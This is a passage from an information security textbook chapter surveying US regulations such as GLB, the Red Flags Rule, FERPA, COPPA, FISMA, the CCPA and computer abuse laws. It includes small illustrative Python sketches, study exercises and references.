COBIT is an application of COSO for IT, and is published by ISACA [14]. COBIT documents Section 404 requirements for information security. To establish Entity Level controls for quality and integrity of financial information (thereby minimizing fraud), the computing environment is best controlled with an implementation of IT best practices. COBIT applies the five COSO components to the IT lifecycle: (1) Evaluate, Direct and Monitor; (2) Align, Plan and Organize; (3) Build, Acquire and Implement; (4) Deliver, Service and Support; and (5) Monitor, Evaluate and Assess. These key areas derive 40 detailed requirements. Key Area Evaluate, Direct and Monitor addresses governance objectives in defining IT's relationship with executive management. Key Area Align, Plan and Organize emphasizes strategic planning, IT-business alignment, and IT-interdepartmental communication. Key Area Build, Acquire and Implement addresses defining requirements, testing configurations, and tracking changes. Key Area Deliver, Service and Support includes managing operations, incidents, problems, continuity, and security. The final Key Area, Monitor, Evaluate and Assess, addresses monitoring of performance, conformance, and internal controls. This comprehensive standard defines a maturity model of six levels (0–5), enabling an organization to ascertain where it stands and how it can progress to higher maturity levels (a simple sketch of such tracking follows below). Further information on COBIT is also outlined in Chap. 6 Governing.

It is widely recognized that SOX adherence is expensive to implement, but it has also resulted in fewer cases of business fraud and accounting scandals [10], and for good reason: CEOs who "recklessly" certify false organizational financial statements face up to 10 years of imprisonment and fines of up to $1 million, with larger penalties (up to 20 years and $5 million) applying to "willful" violations [11].
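As a rough, hypothetical illustration of how an organization might track the COBIT maturity model described above (the key area names come from COBIT; the maturity levels and target are invented for illustration):

# Hypothetical sketch: tracking COBIT maturity levels (0-5) per key area
# to see where the organization stands and where to improve next.
current_levels = {
    "Evaluate, Direct and Monitor": 2,
    "Align, Plan and Organize": 3,
    "Build, Acquire and Implement": 2,
    "Deliver, Service and Support": 4,
    "Monitor, Evaluate and Assess": 1,
}
target_level = 3  # invented target, for illustration only

# List the key areas below target, weakest first.
for area, level in sorted(current_levels.items(), key=lambda kv: kv[1]):
    if level < target_level:
        print(f"{area}: level {level} ({target_level - level} below target)")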


18.1.4 Gramm–Leach–Bliley Act (GLB), 1999

This act, also known as the Financial Services Modernization Act, applies to consumer financial transactions. It protects personal financial information, but also allows banks, securities, and insurance companies to merge, to allow one-stop shopping for financial needs [3].

Applicability: GLB applies to organizations that significantly engage in financial products or services, including mortgage brokering, credit counseling, property appraisals, tax preparation, credit reporting, and ATM operations with customer knowledge [15].

General Requirements: There are three components to this regulation [3].

The Privacy Rule requires that financial institutions communicate a Notice of Privacy Practices (NPP) to their customers, at first transaction and annually thereafter. This NPP should describe how the organization protects Nonpublic Personal Information (NPI), which includes name, address, and phone numbers when associated with financial data, social security number, financial account numbers, credit card numbers, date of birth, customer relationship information, and details of financial transactions. However, financial companies may share credit reports and credit applications with third parties, unless a customer specifically 'opts out' of this disclosure type [3].

The Pretexting Rule outlaws the use of counterfeit documents and social engineering to obtain customer information. It also requires that organizations include security awareness training for employees. Employees should be trained to recognize and report social engineering attempts.

The Safeguards Rule requires that financial institutions develop an information security program that describes the administrative, technical, or physical controls used to protect personal financial information [3]. This program must include one or more designated employee(s) to coordinate security, a risk assessment program, control over contractors, periodic review of policies, employee training and other personnel security, physical security, data and network security, intrusion detection, and an incident response program [15].

The major problem with GLB was that it applied only to financial institutions, and not to the myriad of retailers that provide credit. Thus, its scope was too limited.

18.1.5 Identity Theft Red Flags Rule, 2007

A follow-up regulation to GLB, the Fair and Accurate Credit Transactions Act of 2003, defined the Identity Theft Red Flags Rule to further minimize identity theft [3, 16].


Applicability: The Red Flags Rule (RFR) applies to any 'creditor', including those who provide credit card accounts, utility accounts, cell phone accounts, and retailers who provide financing. The term 'creditor' has a fairly lengthy definition: it (1) applies to those organizations that provide credit, defer payment, or bill customers for products and services, and (2) covers those that provide funds for repayment, and/or use credit reports, and/or provide information to credit reporting agencies about consumer credit.

General Requirements: These organizations must provide a written 'Identity Theft Prevention Program', which describes how Red Flags should be detected and handled by their employees. Agencies regulating this rule established five categories and many examples of red flag situations (as outlined in Chap. 2 Fraud). The program should include the list of red flags that apply to the organization, as well as how these red flags shall be detected and handled. Employees shall be trained for Red Flags, and contractual agreements must be specified with service providers. The program shall be reviewed periodically, and approved by the organization's board of directors [3]. The size and complexity of the plan should be commensurate with the organization's size.

The organization needs to protect 'covered accounts', which include consumer accounts that involve multiple transactions, or other accounts where the risk of identity theft is 'reasonably foreseeable', such as Internet or telephone accounts, or where there is a history of identity theft [16]. The FTC and other government agencies enforce the RFR [16].
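As a rough illustration (not FTC guidance), an organization's documented red-flag list could be encoded so that account events are checked and escalated consistently; the flag names and event fields below are invented examples:

# Hypothetical sketch: checking account events against an organization's
# documented Red Flag list, per its Identity Theft Prevention Program.
RED_FLAGS = {
    "address_discrepancy": lambda e: e.get("application_address") != e.get("credit_report_address"),
    "suspicious_document": lambda e: e.get("id_document_altered", False),
    "dormant_account_activity": lambda e: e.get("dormant", False) and e.get("new_activity", False),
}

def detect_red_flags(event: dict) -> list[str]:
    """Return the names of all red flags raised by an account event."""
    return [name for name, check in RED_FLAGS.items() if check(event)]

event = {"application_address": "123 Elm St", "credit_report_address": "9 Oak Ave",
         "dormant": True, "new_activity": True}
print(detect_red_flags(event))  # -> ['address_discrepancy', 'dormant_account_activity']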

18.1.6 Family Educational Rights and Privacy Act (FERPA), 1974, and Other Child Protection Laws

FERPA protects personally identifiable information (PII) such as name, social security number, and student number [3]. Although not listed as PII, grades are also protected (with some allowances). Students and their guardians at public institutions shall be able to view their records, request corrections to their records, and receive a disclosure notification annually, which tells students of their FERPA rights. These permissions apply to parents of students younger than 18, to students 18 or over, and to students attending a school of higher education [18]. Schools may disclose some defined directory information for students, but must enable students to opt out. Information that is not protected by FERPA privacy includes police records, student majors, grade level, honors and awards, dates of attendance, status (full/part-time), and participation in officially sponsored sports or clubs [18]. If a school is found to be in violation of FERPA, e.g., because of repeat offenses, it can lose federal funding.

Other student-related regulation includes [3]:


18.1.6.1 Children's Online Privacy Protection Act (COPPA), 1998

COPPA protects children's privacy on the Internet, including their name, contact information, images, and identifiers such as social security number, geolocation, and IP address [3]. Children may be distinguished from adults by asking for their age or birthdate, or by charging a fee via credit card. The law requires parental consent before collecting personal information from children under 13 years. This parental consent may be collected via credit card, toll-free numbers, signed forms, video conference, or a government-issued identification. The website must also widely advertise a Privacy Policy indicating how data is collected, used, and disseminated, and how this data can be purged or modified. The FTC has collected $3 million, $800,000, and $250,000 from three organizations violating COPPA.

18.1.6.2 Children's Internet Protection Act (CIPA), 2000

Schools and libraries receiving federal funding must filter web content for children under 17 years [3]. Websites to be filtered include pornography, obscene materials, and materials deemed harmful to minors. Filters can be disabled for adults. An Internet Safety Policy must be available to all users. It shall describe appropriate access and restrictions for minors.
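Both COPPA's consent requirement and CIPA's filtering rule hinge on simple age thresholds; the following is a minimal, hypothetical sketch (function names invented):

# Hypothetical sketch of the COPPA and CIPA age thresholds described above.
def coppa_needs_parental_consent(age: int) -> bool:
    # COPPA: parental consent is required before collecting personal
    # information from children under 13.
    return age < 13

def cipa_filter_required(age: int, federally_funded: bool) -> bool:
    # CIPA: federally funded schools/libraries must filter web content
    # for minors under 17; filters can be disabled for adults.
    return federally_funded and age < 17

print(coppa_needs_parental_consent(12))          # -> True
print(cipa_filter_required(16, federally_funded=True))  # -> True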

18.1.7 Federal Information Security Management Act (FISMA), 2002

The E-Government Act of 2002 was designed to protect government information for the purpose of economic and national security interests, in the wake of the September 11, 2001 terrorist attacks. The E-Government Act's Title III is entitled the Federal Information Security Management Act (FISMA). It replaced the less comprehensive Computer Security Act (CSA) of 1987. Both the CSA and FISMA authorized the National Institute of Standards and Technology (NIST) to develop minimum standards. FISMA must be adhered to by federal agencies, their contractors, and other entities whose systems interconnect with U.S. government information systems. FISMA also set in place US-CERT, a national incident response center. This regulation is important: Federal Chief Information Officer Vivek Kundra said in 2010 that government computers are attacked millions of times each day [3].

FISMA adherents must perform risk-based security to comply with the NIST Risk Management Framework. The risk analysis determines which controls are recommended. Recommended controls are listed in Federal Information Processing Standards (FIPS). An overview of security requirements is provided in NIST 800-53, Security and Privacy Controls for Information Systems and Organizations [19]. This document describes requirements for high, moderate, and low impact (or


not applicable) information systems. The security category (SC) for each system depends on the highest rating assigned for confidentiality, integrity, and availability. An example category would be [20]:



SC(sensor data) = {(confidentiality, NA), (integrity, MODERATE), (availability, HIGH)}
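Since the system's overall rating is simply the highest of the three (a "high-water mark"), the categorization can be sketched in a few lines; this is hypothetical illustration code, not from NIST:

# Hypothetical sketch: deriving a system's overall impact level from its
# FIPS 199 security category, using the highest rating assigned.
LEVELS = {"NA": 0, "LOW": 1, "MODERATE": 2, "HIGH": 3}

def overall_impact(security_category: dict) -> str:
    # The overall impact is the highest of the confidentiality,
    # integrity, and availability ratings.
    return max(security_category.values(), key=lambda rating: LEVELS[rating])

sensor_data = {"confidentiality": "NA", "integrity": "MODERATE", "availability": "HIGH"}
print(overall_impact(sensor_data))  # -> HIGH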

The low, moderate, and high ratings refer to whether a compromise of the security aspect would have a limited, serious, or severe/catastrophic impact, respectively, on the organization's operations, assets, or persons. The areas that NIST 800-53 addresses include (but are not limited to) [19]:

(i) Access control: Access to government information is limited to authorized users, processes, and devices; discusses temporary, emergency, and group accounts; includes information flow, segregation of duties, least privilege, and remote and wireless access.
(ii) Awareness and training: All staff are trained to perform security functions as needed to adhere to law and retain secure systems.
(iii) Audit and accountability: System logs are retained and analyzed to enable investigation into wrongdoing, including tracking individual user actions.
(iv) Assessment, authorization and monitoring: Organizations are periodically audited, penetration tested, and certified, and must continuously monitor the effectiveness of security controls.
(v) Configuration management: Organizations must maintain an inventory and library system for baseline and evolving information (including documentation, software, hardware, and change management).
(vi) Contingency planning: Business continuity planning prepares agencies to minimize the impact of availability-related emergency situations; includes backups, training, testing, alternate sites, and telecommunications.
(vii) Identification and authentication: Access to government computers is provided only to properly authorized users, devices, or processes; includes services, cryptographic module authentication, multifactor, bidirectional, token-based, biometric, and PKI authentication.
(viii) Incident response: Organizations must prepare or plan to appropriately handle security-related incidents, and document and report on these incidents when they occur.
(ix) Maintenance: Information systems shall be properly maintained, and the personnel, tools, techniques, and mechanisms which perform the maintenance shall be effectively controlled.
(x) Media protection: Paper and computerized data must be securely handled and destroyed; includes media marking, access, storage, transport, sanitization, use, and downgrading.
(xi) Physical and environmental protection: Information systems shall be protected from environmental hazards and physical access by unauthorized persons, and shall be maintained in an environment conducive to proper operation; includes visitors, emergencies, power, fire, water, and asset monitoring.
(xii) Planning: Organizations shall develop and maintain privacy and security plans that analyze risk and describe the security controls, including proper use of computer systems by users.
(xiii) Program management: Management responsibilities include planning/scheduling, organizing, measuring, architectures, inventory, and risk management.
(xiv) Personnel security: Organizations ensure that personnel and contractors with access to information systems are trustworthy and comply with regulations; that access is revoked when such personnel are terminated; and that sanctions are applied for misuse.
(xv) Personally Identifiable Information processing and transparency: Addresses information privacy through the use of authority, privacy notice, and consent.
(xvi) Risk assessment: Periodic risk assessment considers risk affecting the agency's mission, functions, image, and reputation, and impacting information assets, operations, and individuals.
(xvii) Systems and services acquisition: In-house and outsourced software development shall follow a lifecycle with documentation that addresses security, and includes software development requirements, testing, configuration management, a restricted installation, and use of data.
(xviii) System and communications protection: System protection includes methods of system engineering that address network security; communications protection and controls against network-based attacks include protecting transmissions at external and key internal boundaries.
(xix) System and information integrity: Information technology shall monitor and protect against malware, provide alerts, and correct errors in information, software, and firmware in a timely manner.
(xx) Supply chain risk management: Secure processes related to supply chains include risk management, supply chain controls and processes, and component authenticity and disposal.

The NIST Federal Information Processing Standards and Special Publications (guidelines) are freely available for access and provide an excellent foundation for any security solution.

18.1.8 California Consumer Privacy Act (CCPA)

This data privacy regulation went into effect August 14, 2020, and was amended March 15, 2021, to protect residents of California [23, 25]. This landmark legislation (at least for the U.S.) was, at the time of writing, the only generalized privacy regulation in the nation. It is meant to provide privacy to consumers in the collection and sale of their information, chiefly by enabling them to opt out of the sale of their information.


Applicability: Personal information in all forms, whether electronic or not, is protected for California residents while in California. This is true regardless of where the business operates. When multiple laws may be applicable, the law that provides the strongest consumer protection prevails. This state law supersedes lower-level laws (e.g., city, municipal) [24].

General Requirements: This regulation is best read in combination with the Information Privacy chapter. Rights provided by the CCPA include (defined further within Chap. 10) [24]:

• Right to Know (1798.100): This right ensures that at or before the time of information collection, consumers are told what information is collected about them. It also ensures that consumers may request information to learn the types and specific information held about them. If an organization does not store or sell information, but uses it only one time for transactional purposes, then this does not apply.
• Information that the consumer can obtain is further spelled out in Request to Know – General and Sales (1798.110, 1798.115). In addition to the types and specific information collected, they can learn the source(s) and purpose(s) of the information collected. Related to information sold, consumers may learn the categories of information buyers and the types of information sold to each. Third party buyers shall not be able to resell this information without explicit consumer consent.
• Consumers shall be informed of their right to this information.
• Right to Deletion (1798.105): A consumer may request that their personal information be deleted, and the business shall comply, except under special conditions. Conditions where the business need not comply include when: a transaction is underway; a processing error is being corrected; a crime is being investigated or legal actions are underway; to retain free speech privileges; for approved research or public statistics collection; or for internal-only uses of the freely offered information.
• Right to Opt-Out of Sales (1798.120): Businesses shall inform consumers that their information may be sold, and provide them with the ability to opt out of this sale. When consumers opt out of their information being sold, their information shall not be sold until they provide explicit permission to do so.
• Concerning the sale of information on children, organizations must obtain parental permission to sell any personal information for children less than 13 years old, and must provide children between 13 and 15 the chance to opt in to such sales (as opposed to opting out).
• This right was amended in 2021 to describe the opt-out procedure (999.306) [25]. There should be at least two methods to opt out, including a "Do Not Sell My Personal Information" link on the home webpage or landing page of a mobile application. Alternative methods of opting out may include a toll-free phone number, email address, submitted form, etc. The opt-out text must be in plain


English, readable to those with disabilities, and provided in alternative languages if those languages are used elsewhere for other purposes.
• Right to Nondiscrimination (1798.125): Consumers shall not suffer discrimination based on their option to not have their information sold. It is possible for an organization to sell or provide a product or service at higher value, if the higher value is commensurate with the value of the sale of the personal information, with the final caveat that: "A business shall not use financial incentive practices that are unjust, unreasonable, coercive, or usurious in nature." (1798.125 bullet b.4)
• Private Right of Action (1798.150): Consumers are responsible for notifying a business of any privacy violation, and allowing the organization to respond within 30 days. If the issue(s) are not rectified, a single person or a class of consumers may sue. Consumers are entitled to recover damages via civil suit between $100 and $750 each, per incident, or they can sue for actual damages. In considering damages, courts may consider the nature, duration, and number of violations, and the financial worth and willfulness of misconduct of the defendant. Likewise, businesses are liable for civil penalties from the state of California. The state also must give 30 days' notice to correct the noncompliance. Penalties may total $2500 per violation or $7500 per willful violation.
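The sale-of-information rules above reduce to a small decision procedure; the following is an illustrative sketch (not legal logic; the function and parameter names are invented):

# Illustrative sketch of the CCPA sale rules described above: opt-out for
# consumers 16 and over, opt-in for ages 13-15, parental permission under 13.
def may_sell_info(age: int, opted_out: bool, opted_in: bool,
                  parental_permission: bool) -> bool:
    if age < 13:
        return parental_permission   # parental permission required
    if age <= 15:
        return opted_in              # must affirmatively opt in
    return not opted_out             # may be sold unless the consumer opts out

# Example: a 14-year-old who has not opted in.
print(may_sell_info(age=14, opted_out=False, opted_in=False,
                    parental_permission=False))  # -> False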

18.2 Computer Abuse Laws

These laws are meant to protect organizations from attackers. A person can be charged with a misdemeanor or a more serious felony crime. Misdemeanor crimes are generally punishable by less than one year in prison, while felony convictions earn one year or more [3]. Both can also result in fines.

The Computer Fraud and Abuse Act (CFAA) of 1984 protects against traditional cracking. The USA PATRIOT Act of 2001 amended the CFAA by lowering damage thresholds and increasing penalties. The current CFAA protects against trespassing on a Government, financial institution, or other 'protected' computer, which is any computer that participates in interstate or foreign commerce or communications [22]. Misdemeanor crimes include negligent damage, trafficking in passwords, and unauthorized access or access in excess of authorization. It is generally viewed that insiders may 'exceed authorization' (unless clearly documented) while outsiders are 'without authorization'. Felony crimes include obtaining or damaging information valued at or exceeding $5000; or damage to ten or more computers; or a threat to public health or safety, justice, national security, or physical injury; or if the crime includes fraud, extortion, recklessness, or criminal intent [3, 26]. Penalties include fines and from one to ten years in prison, except a maximum penalty of 20 years applies in cases of obtaining national security information


and/or repeat cases of intentional or reckless damage [26], with potential life in prison for a reckless attempt to cause, or causing, death.

The Wiretap Act, amended 1986: Covers electronic communications. This law was used to prosecute President Nixon's Watergate burglars [26]. This law covers interception and/or disclosure and/or use of intercepted communications, including cloning emails, spyware, and use of protocol sniffers. The offense must be intentional. A defense stipulates that the recorded party(s) must consent to the recording. This felony incurs penalties of $250,000 (individuals) to $500,000 (organizations) and a maximum 5-year prison sentence.

The Electronic Communications Privacy Act (ECPA), 1986: Disallows eavesdropping on network communications (a felony) and stored data (a misdemeanor). The USA PATRIOT Act of 2001 amended the ECPA by allowing the government to intercept electronic communications for national security reasons, requiring only a low level of justification [3]. It also enables service providers to request help from law enforcement or government agencies to capture communications of intruders. Finally, it enables service providers to release communications to law enforcement if they suspect crimes or danger to life. Any such freely provided communications, obtained without a warrant, may then be used as evidence in court.

18.3 Other Laws

Other laws addressing specific areas related to security but outside the scope of this text include [3, 22, 26]:

• Unlawful Access to Stored Communications, 1986: Protects email and voice mail from unauthorized access. Misdemeanor or felony.
• Wire Fraud, 1952, with updates to 2008: Using communications (including by wire, radio, or television) to perpetrate fraud. Penalties for defrauding a financial institution can reach $1 million and/or 30 years imprisonment.
• Child Protection and Obscenity Enforcement Act, 1988: Prohibits knowing possession of any printed, video, or digital file containing child pornography, which is transported across state lines.
• Identity Theft and Assumption Deterrence Act, 1998: Prohibits the unauthorized transfer and use of personally identifiable information, including name, social security number, birth date, government ID/numbers, biometric data, telecommunications ID, routing codes, etc. Violations can result in fines and 5–15 years in prison. This was amended by the Identity Theft Penalty Enhancement Act, 2004, specifically prosecuting computer criminals selling payment card information obtained through hacking or phishing. In addition to prison time, fines can compensate victims for the time and expenses spent rectifying the damage caused. An Access Device Fraud law can similarly address such crimes, where 'access device' refers to a means of account access, such as a counterfeit device.


• Anti-Cybersquatting Consumer Protection Act, 1999: Entities may sue cybersquatters, who acquire a domain name which is a registered trademark or trade name of another organization.
• Controlling the Assault of Non-Solicited Pornography and Marketing (CAN-SPAM), 2003: Commercial e-mailers must follow specific requirements, such as using clear subject lines, accurate headers, and clear source identifiers, and describing how the recipient can opt out of future emails.
• International Traffic in Arms Regulations (ITAR), Export Administration Regulations (EAR), and Regulations from the Office of Foreign Asset Control (OFAC): These laws prohibit export of certain technologies and information overseas without a license (if export is allowed at all).
• Patent Act, 1952; Trademark Act, 1946; Copyright Act, 1976; Digital Millennium Copyright Act, 1998; Economic Espionage Act, 1996, 2012: These all deal with patents, copyrights, and trademarks.
• Americans with Disabilities Act (ADA), 1990 [27]: This civil rights law prohibits discrimination against people with disabilities. It applies to state and local governments and public and commercial facilities, including restaurants, schools, doctors' offices, transportation, factories, and office buildings (including security positions). Disabilities include hearing, vision, illness, injury, physical abilities, depression, etc. "Architectural barriers" limit accessibility to parts of a building (e.g., stairs) for persons with disabilities. Expected changes are evaluated as "readily achievable," which considers the level of changes required and their affordability to the organization. "Program access" applies to state and local governments to ensure that persons with disabilities are not limited from any "program, service or activity". The Rehabilitation Act applies the same rules to federal agencies, with its Section 508 mandating that federal information and communication technology be made accessible.

18.4 Final Considerations

In the United States, President Obama issued an Executive Order requesting that the government share with industry its knowledge of cybersecurity attacks and prevention [6]. NIST is developing a voluntary best-practices framework on cybersecurity. If your organization adheres to the law and these policies and a data breach occurs, your organization will have a defense.

Some competing organizations in the same industry may meet to collaborate on security defense. They share known attacks in order to better defend their proprietary information against state-sponsored spying. While this may be a good idea, it is important to discuss with legal counsel how this can be established and executed while avoiding charges of anti-competitive behavior.


18.5 Advanced: Understanding the Context of Law

Because information security incidents often involve criminals, this book discusses security regulation in a few Advanced sections. In this chapter, understanding the types and jurisdictions of law is useful if you ever consider going to court. Three sources of law in the United States include [3]:

Criminal Law: The prosecution of parties charged with crimes against public order, as specified in the federal and state criminal codes. The evidence must show "beyond a reasonable doubt" that the defendant is guilty. This means that there can be no reasonable doubt in the mind of a reasonable judge or juror, but not that they are 100% sure.

Civil Law: A person, organization, or government who has been harmed can ask for redress from the party who inflicted harm. These cases can be based on regulation or common law. Common law follows the general principles and body of traditional or precedent judicial cases that the United States inherited from England. To decide a case, there must be a "preponderance of the evidence", which means that it is more probable than not (>50%) that the wrong action occurred. Some civil cases require the higher standard of "clear and convincing evidence" to convince the court that the wrong action was likely to have occurred.

Administrative Rules: Federal and state governments can delegate responsibility to agencies to create and enforce rules and/or judge cases. There must be a process to ensure fairness. Cases may be reviewed by a federal court. The evidence standard is the lowest, "not arbitrary or capricious", which means that the facts of the case should reasonably correspond to the administrative decision. One such agency making decisions in the security realm is the Federal Trade Commission (FTC). The Federal Trade Commission Act gives the FTC permission to define specific rules for "acts or practices which are unfair or deceptive acts or practices in or affecting commerce" and also to sanction violators.

Five different levels of regulation, ordered from most to least powerful, are described below. Lower levels of regulation must conform to all higher levels. They include [3]:

1. U.S. Constitution: Defines the structure of the federal government and its relationship with the states. It also includes the Bill of Rights, outlining personal freedoms.
2. Federal Laws: These laws passed by Congress are maintained in the U.S. Code. The Constitution allows Congress to regulate commerce between the states, as well as to declare war, print money, and maintain the post office and armed forces. Federal District Courts can hear cases relating to the Constitution or federal laws, and cases between residents of different states summing to losses over $75,000. The Circuit Courts of Appeals and the Supreme Court handle appeals of federal cases. The Supreme Court can also hear cases between different state


governments, and perform judicial reviews when state or federal laws may violate the Constitution.
3. State Constitution: Describes the structure of the state government and the relationship between the state and its citizens. It defines an additional set of personal rights on a state-by-state basis.
4. State Laws: State governments may pass laws affecting state residents. State courts generally include a Trial Court, State Court of Appeal, and State Supreme Court. State courts may address cases of state or federal law, but must always apply the hierarchy of laws and consider Supreme Court decisions as precedent. With the long reach of the Internet, crimes may be instigated from outside the state, but can be prosecuted within the state if the crime occurred within state boundaries.
5. Common Law: Case tradition provides precedent when regulations do not explicitly address a situation.

The Internet not only spans states, it also spans nations. This causes additional jurisdiction problems when crimes occur across borders. To counter such crimes and promote cooperation in investigations and prosecution, 53 nations signed a Convention on Cybercrime [3]. This agreement requires members to prohibit certain cyber-crimes and copyright infringement. Forty-two nations, including the U.S., have ratified the treaty.

18.6 Questions and Problems

1. Vocabulary. Match each regulation or standard with its applicable area of coverage: HIPAA, FERPA, CCPA, FISMA, PCI DSS, Sarbanes–Oxley, Gramm–Leach–Bliley, State breach notification, Identity theft red flags rule.

(a) Addresses the privacy and security of health information.
(b) Standard required by payment card companies, to ensure security of payment card information, through audits and network scans.
(c) Addresses privacy of identity information, including social security numbers, financial information, state/driver's license information, and possibly other information.
(d) Secures student information.
(e) Secures information within federal government agencies.
(f) Addresses financial statement fraud in corporations.
(g) Addresses privacy and security of financial information, including ensuring employees recognize and report social engineering attempts.


(h) Organizations reporting or providing credit or credit information must protect customers from social engineering scams.
(i) California privacy law that protects consumers and their right to not have their information sold.

2. State Breach Notification Law. Read the law that applies to your state or territory. What are the basic tenets required? For a reference on the regulation, see: https://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx.

3. Audit: Local State Breach. Your local business does business primarily in one state, with no online sales. Prepare an Audit Engagement Plan to ensure that your organization adheres to its state breach notification law. Consider not only verifying documented policy, but also implementation. An example Audit Engagement Plan is provided in Table 15.2.

4. Audit: California Consumer Privacy Act. Your large business operates primarily through online sales, with 20% of sales from California. Prepare an Audit Engagement Plan to ensure that your organization adheres to the California privacy law. Consider not only verifying documented policy, but also implementation. An example Audit Engagement Plan is provided in Table 15.2.

5. Evidence Requirements. Match the type of evidence required with each type of case: administrative, civil, criminal. Then number each evidence level according to the level of certainty required by the jurors to convict, with the most certain as your number 1 selection.
(a) Clear and convincing evidence
(b) Not arbitrary or capricious
(c) Preponderance of the evidence
(d) Beyond a reasonable doubt

6. Broken Laws Case. A criminal cyber team sends a phishing email with a whitepaper link to a banker at First National Bank. The banker follows the link to the infected web site and unknowingly downloads spyware and a rootkit. The spyware monitors login-password credentials into the company database containing customer information. The criminal team exfiltrates customer financial information, but an Intrusion Prevention System recognizes the data transmission and halts it midway. The security team investigates to find the malware, spending hours with logs, investigating computer workstations, and monitoring transmissions. What laws were broken? What could the criminal team be charged with, if they could be pinned down?

7. Industry-Specific Regulation and Standards. For your selected industry/major/specialty, list which regulations and standards your industry definitely needs, and which it may need, to adhere to. Example industries you may select from include: health, manufacturing, finance, retail, entertainment, education, hotel, computer manufacturing, software development, or others. How would this law apply to your industry and why?


8. Legal Analysis. Your organization does online sales in the U.S. How would you plan to adhere to the state breach notification laws? How might you address 50 different sets of laws? What arguments might be compelling that you adhere to state breach notification law?

9. Non-IT Aspects of Regulation and Standards. Consider one of the following American security regulations or standards: HIPAA, Gramm–Leach–Bliley, Sarbanes–Oxley, CCPA, or FISMA. What non-IT requirements do they impose that would not be addressed by this text? Some websites provide government- or standards-based information, and thus are authentic sources of information. Consider the sites listed below. If specific links do not work, search the main site using the name of the regulation. Note to instructor: Providing some of the documentation within the course's learning management system may be helpful.
(a) HIPAA/HITECH: Chap. 19 of this text or www.hhs.gov (Health and Human Services) and search for HIPAA.
(b) Gramm–Leach–Bliley and Red Flags Rule: Federal Trade Commission: http://www.business.ftc.gov/privacy-and-security
(c) Sarbanes–Oxley: www.isaca.org (Organizations for standards/security) Your instructor may provide 'Information Security Student Book: Using COBIT®5 for Information Security', available at www.isaca.org. Additional information is at www.sans.org; search for 'COBIT'.
(d) FISMA: www.nist.gov (National Institute of Standards and Technology) and search for FISMA. Specific link: https://csrc.nist.gov/Projects/risk-management/fisma-background. Access FIPS Publication 200 first.
(e) California Consumer Privacy Act: https://oag.ca.gov/privacy/ccpa/regs.

References

1. Perlroth N (2014) Online security experts link more breaches to Russian government. New York Times, 28 October 2014
2. Johnson J, Lincke SJ, Imhof R, Lim C (2014) A comparison of international information security regulation. Interdiscip J Inf Know Manag 9:89–116
3. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 38–48, 68–270, 350–383
4. Connors TJ (2010) States add more criteria to breach notification laws. Manag Healthc Exec 20(11):10
5. National Conference of State Legislatures (2022) State security breach notification laws. http://www.ncsl.org/issues-research/telecom/security-breach-notification-laws.aspx. Accessed 2 Aug 2022
6. Thompson L (2013) Privacy: the tidal waves of the future. In: ISACA chapter meeting, Rosemont, 13 Dec 2013
7. Kempfert AE, Reed BD (2011) Health care reform in the United States: HITECH act and HIPAA privacy, security, and enforcement issues. FDCC Q 61:240–273
8. Dalgleish C (2009) Course: HIPAA compliance. Triton College, River Grove
9. Dowell MA (2012) HIPAA privacy and security HITECH act enforcement actions begin. Employee Benefit Plan Rev 2012:9–11


10. Hoggins-Blake R (2009) Dissertation: examining non-profit post-secondary institutions' voluntary compliance with the Sarbanes–Oxley Act. ProQuest dissertations and theses, January 2009, pp 1–51
11. Yallapragada RR, Roe CW, Toma AG (2010) Sarbanes–Oxley Act of 2002 and non-profit organizations. J Bus Econ Res 8(2):89–93
12. Narain LS (2009) Implications of the Sarbanes–Oxley Act for nonprofit organizations. Bus Rev (Camb) 13(2):16–22
13. Ramos MJ (2008) How to comply with Sarbanes–Oxley section 404: assessing the effectiveness of internal control. Wiley, Hoboken, pp 1–23, 228–229
14. ISACA (2012) COBIT 5: enabling processes. ISACA, Arlington Heights
15. Federal Trade Commission (2006) Financial institutions and customer information: complying with the safeguards rule. http://www.business.ftc.gov/documents/bus54-financial-institutions-and-customer-information-complying-safeguards-rule. Accessed 15 Nov 2013
16. Federal Trade Commission (2013) Fighting identity theft with the red flags rule: a how-to guide for business, May 2013. https://www.ftc.gov/business-guidance/resources/fighting-identity-theft-red-flags-rule-how-guide-business. Accessed 22 Oct 2022
17. FTC (2013) Fighting identity theft with the red flags rule: a how-to guide for business. Federal Trade Commission. http://business.ftc.gov/documents/bus23-fighting-identity-theft-red-flags-rule-how-guide-business. Accessed 15 May 2013
18. Carlson CS (2012) Navigate the FERPA nuisance. Quill 100(2):31
19. NIST (2020) NIST Special Publication 800-53: security and privacy controls for information systems and organizations, rev. 5. National Institute of Standards and Technology, U.S. Dept of Commerce. https://doi.org/10.6028/NIST.SP.800-53r5
20. NIST (2006) Minimum security requirements for federal information and information systems. FIPS Pub. 200. National Institute of Standards and Technology, March 2006
21. Common Criteria (2012) Common criteria for information technology security evaluation: part 1: introduction and general model, vers 3.1, rev 4, September 2012
22. Bragg R, Rhodes-Ousley M, Strassberg K (2004) Network security: the complete reference. McGraw-Hill/Osborne, New York, pp 762–768
23. California Attorney General (2021) Chapter 20. California consumer privacy act regulations: final regulation text: title 11. State of California Department of Justice. https://oag.ca.gov/sites/all/files/agweb/pdfs/privacy/ccpa-add-adm.pdf
24. Cooley (2018) California Consumer Privacy Act of 2018 – full text. https://cdp.cooley.com/ccpa-2018/#section-1798-175
25. Bonta R (2022) CCPA regulations. State of California Dept. of Justice, Office of the Attorney General. https://oag.ca.gov/privacy/ccpa/regs
26. Jarrett HM, Bailie MW, Hagen E, Eltringham S (eds) (n.d.) Prosecuting computer crimes. Office of Legal Education, Computer Crime and Intellectual Property Section, Criminal Division, USA. https://www.justice.gov/criminal/file/442156/download
27. ADA (2023) The Americans with Disabilities Act (ADA) protects people with disabilities from discrimination. U.S. Dept. of Justice, Civil Rights Division. https://www.ada.gov/

Chapter 19

Complying with HIPAA and HITECH

Health care organizations should take note that there are now 38 enforcement actions in our Right of Access Initiative and understand that OCR is serious about upholding the law and people's fundamental right to timely access to their medical records. – Office for Civil Rights (OCR) Director Lisa J. Pino, July 15, 2022 [1]

